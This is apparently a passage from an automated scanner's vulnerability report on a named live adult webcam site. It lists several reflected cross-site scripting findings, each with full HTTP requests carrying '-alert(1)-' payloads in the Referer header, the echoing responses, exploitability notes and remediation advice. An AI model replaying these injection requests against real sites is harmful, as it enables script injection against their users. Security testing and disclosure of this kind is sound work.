GET /live-sex-chats/cam-girls/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:34 GMT Connection: close Content-Length: 27209 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/hotspots/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=abdb3'-alert(1)-'17f2cec9909
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:14 GMT Connection: close Content-Length: 40632 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=abdb3'-alert(1)-'17f2cec9909&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e389'-alert(1)-'41c0351c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cams-aroundthehouse/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=5e389'-alert(1)-'41c0351c2c2
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:31 GMT Connection: close Content-Length: 33186 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/&rf=http://www.google.com/search?hl=en^q=5e389'-alert(1)-'41c0351c2c2&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9792b'-alert(1)-'ba39155c916 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/caught-on-cam/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=9792b'-alert(1)-'ba39155c916
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 25658 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... xt/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/&rf=http://www.google.com/search?hl=en^q=9792b'-alert(1)-'ba39155c916&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67099'-alert(1)-'bb279cc6b57 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=67099'-alert(1)-'bb279cc6b57
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:29 GMT Connection: close Content-Length: 113880 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/&rf=http://www.google.com/search?hl=en^q=67099'-alert(1)-'bb279cc6b57&qs=cat=1^roomid=12&qs=cat=1^roomid=12&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8877f'-alert(1)-'f0d179f333a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=8877f'-alert(1)-'f0d179f333a
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:07 GMT Connection: close Content-Length: 213457 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/&rf=http://www.google.com/search?hl=en^q=8877f'-alert(1)-'f0d179f333a&qs=cat=1^roomid=13&qs=cat=1^roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c608e'-alert(1)-'0606a3ceeb1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/fetish/categories/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=c608e'-alert(1)-'0606a3ceeb1
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:36 GMT Connection: close Content-Length: 24548 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/&rf=http://www.google.com/search?hl=en^q=c608e'-alert(1)-'0606a3ceeb1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bee'-alert(1)-'306a0aabfe1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/free-sex-video-for-ipod/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=96bee'-alert(1)-'306a0aabfe1
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 72576 Vary: Accept-Encoding
